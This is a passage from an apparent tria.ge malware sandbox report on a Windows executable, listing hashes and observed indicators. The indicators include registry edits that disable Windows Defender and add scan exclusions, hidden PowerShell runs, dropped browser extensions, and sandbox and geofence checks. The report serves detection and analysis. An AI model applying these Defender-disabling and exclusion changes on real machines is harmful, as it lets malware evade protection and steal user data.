Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
94s -
max time network
100s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
08/08/2024, 22:38
Static task
static1
Behavioral task
behavioral1
Sample
634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe
Resource
win10-20240404-en
General
-
Target
634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe
-
Size
7.3MB
-
MD5
ace0b015f1fdcb6fa55bf1fc1a447dd4
-
SHA1
602ffe036d9bbed14f4230ade5494efecb153834
-
SHA256
634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56
-
SHA512
8bcec61dec5739fffa5b2fd0a92699016cb778709f482fc8144449c4b414aa2632c1d81f4f010836ef1f19edac69843f76af64eb08d49c9fe3315b214af72657
-
SSDEEP
196608:91O9GnorlTq8z+dgAZNHk05e1n2zosorKjfkB:3OQopGAl+Nf5ei4mzkB
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wGQmUIZKEGuxadPB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wGQmUIZKEGuxadPB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wGQmUIZKEGuxadPB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FjYcCGTppOUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eZNCfusnXmtZMmVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wGQmUIZKEGuxadPB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OmYhQlgyU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZOpYAGqatpU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eZNCfusnXmtZMmVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FjYcCGTppOUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dBdCwOiUpBsdC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rZOpYAGqatpU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OmYhQlgyU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dBdCwOiUpBsdC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\GrNhqdvEGRdNaWpSc = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 28 2712 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2036 powershell.exe 340 powershell.EXE 2772 powershell.exe 2884 powershell.exe 2104 powershell.exe 1652 powershell.EXE 1324 powershell.exe 660 powershell.EXE 928 powershell.exe 820 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Control Panel\International\Geo\Nation mAxzPSG.exe -
Executes dropped EXE 4 IoCs
pid Process 2188 Install.exe 1784 Install.exe 1516 rZHgSAw.exe 1620 mAxzPSG.exe -
Indirect Command Execution 1 TTPs 19 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2864 forfiles.exe 2372 forfiles.exe 1864 forfiles.exe 900 forfiles.exe 1692 forfiles.exe 2420 forfiles.exe 2784 forfiles.exe 2320 forfiles.exe 1560 forfiles.exe 1660 forfiles.exe 1976 forfiles.exe 1672 forfiles.exe 1880 forfiles.exe 2616 forfiles.exe 2712 forfiles.exe 2232 forfiles.exe 1352 forfiles.exe 1728 forfiles.exe 2416 forfiles.exe -
Loads dropped DLL 23 IoCs
pid Process 3056 634ef1b100c271e7f8b4e409cbbe96057b7055a4d61a585c1b4ca6bd54296f56.exe 2188 Install.exe 2188 Install.exe 2188 Install.exe 2188 Install.exe 1784 Install.exe 1784 Install.exe 1784 Install.exe 1672 WerFault.exe 1672 WerFault.exe 1672 WerFault.exe 2712 rundll32.exe 2712 rundll32.exe 2712 rundll32.exe 2712 rundll32.exe 2908 WerFault.exe 2908 WerFault.exe 2908 WerFault.exe 2908 WerFault.exe 2908 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe 2156 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json mAxzPSG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mAxzPSG.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 mAxzPSG.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rZHgSAw.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rZHgSAw.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rZHgSAw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA mAxzPSG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD mAxzPSG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mAxzPSG.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_5CF45833F44BFC2995315451A3896ACA mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_9CE832D646FBAFC5C4ACFC523FDD84AD mAxzPSG.exe File created C:\Windows\system32\GroupPolicy\gpt.ini rZHgSAw.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 mAxzPSG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_68D058512F3515153DEB95A1F4E72552 mAxzPSG.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml mAxzPSG.exe File created C:\Program Files (x86)\rZOpYAGqatpU2\iAXvOBgclhGxe.dll mAxzPSG.exe File created C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml mAxzPSG.exe File created C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml mAxzPSG.exe File created C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml mAxzPSG.exe File created C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\iceRYhw.dll mAxzPSG.exe File created C:\Program Files (x86)\dBdCwOiUpBsdC\ScTBkyj.dll mAxzPSG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mAxzPSG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mAxzPSG.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mAxzPSG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mAxzPSG.exe File created C:\Program Files (x86)\OmYhQlgyU\AvBchx.dll mAxzPSG.exe File created C:\Program Files (x86)\FjYcCGTppOUn\DyJfguT.dll mAxzPSG.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\POGTAxIfkFSBYDVsP.job schtasks.exe File created C:\Windows\Tasks\bQeBRIfYCApeQZGKek.job schtasks.exe File created C:\Windows\Tasks\tgKluuvSNQRGAHQwW.job schtasks.exe File created C:\Windows\Tasks\jYxDgykbLQIqEEE.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1672 1516 WerFault.exe 60 2908 1784 WerFault.exe 31 2156 1620 WerFault.exe 223 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2DD12419-103E-4402-B4F1-DD13988B9FCB}\16-c3-d7-1e-96-b0 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs mAxzPSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates mAxzPSG.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2DD12419-103E-4402-B4F1-DD13988B9FCB}\WpadNetworkName = "Network 3" mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mAxzPSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\16-c3-d7-1e-96-b0\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rZHgSAw.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs mAxzPSG.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates mAxzPSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA mAxzPSG.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0027000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mAxzPSG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet 